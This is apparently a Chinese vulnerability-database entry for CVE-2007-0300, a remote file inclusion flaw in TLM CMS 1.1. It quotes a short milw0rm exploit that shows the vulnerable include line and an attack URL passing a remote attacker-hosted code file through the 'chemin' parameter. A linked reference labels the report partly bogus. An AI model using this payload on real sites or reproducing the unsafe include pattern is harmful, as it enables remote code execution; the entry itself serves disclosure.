TLM CMS 'i-accueil.php' PHP远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1111997 漏洞类型 输入验证
发布时间 2007-01-12 更新时间 2007-01-18
CVE编号 CVE-2007-0300 CNNVD-ID CNNVD-200701-259
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3118
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-259
|漏洞详情
TLMCMS1.1及之前版本的i-accueil.php中存在PHP远程文件包含漏洞。远程攻击者可以借助chemin参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
/###################################################################\
# Citations Aléatoires v1.1                                         #
# =========================================================         #
# Published : 2007-01-12                                            #
# Remote: Yes                                                       #
# Site:  ftp://ftp1.comscripts.com/PHP/1809_citation-11.zip         #
#####################################################################
# Author: GolD_M = Mahmood_ali                                      #
# Contact: HackEr_@W.Cn                                             #
# =====================================================             #
# ThanX =All My Friends& ABDULLAH00& AsbMay& ToOoFa& KaBaRa& str0ke #
# SpeciaL GreeTz : Tryag-Team & 4lKaSrGoLd3n-Team                   #
\###################################################################/
# /i-accueil.php                                                    #
# Line:                                                             #
# /13                                                               #
# Vulnerable Code:                                                  #
# include("$chemin/mod_news/index.php");                            #
# 3XP|0!T :                                                         #
# /i-accueil.php?chemin=EV!L.C0D3.TxT                               #
#        /#######################################\                  #
#        #         Tryag.Com & Dwrat.Com         #                  #
#        \#######################################/                  #
\###################################################################/

# milw0rm.com [2007-01-12]
|参考资料

来源:BID
名称:22021
链接:http://www.securityfocus.com/bid/22021
来源:VUPEN
名称:ADV-2007-0176
链接:http://www.frsirt.com/english/advisories/2007/0176
来源:SECUNIA
名称:23722
链接:http://secunia.com/advisories/23722
来源:OSVDB
名称:32814
链接:http://osvdb.org/32814
来源:MILW0RM
名称:3118
链接:http://milw0rm.com/exploits/3118
来源:VIM
名称:20070112[Bogus-partly]VTLMCMS<=1.1(i-accueil.phpchemin)RemoteFileIncludeVulnerability(fwd)
链接:http://attrition.org/pipermail/vim/2007-January/001238.html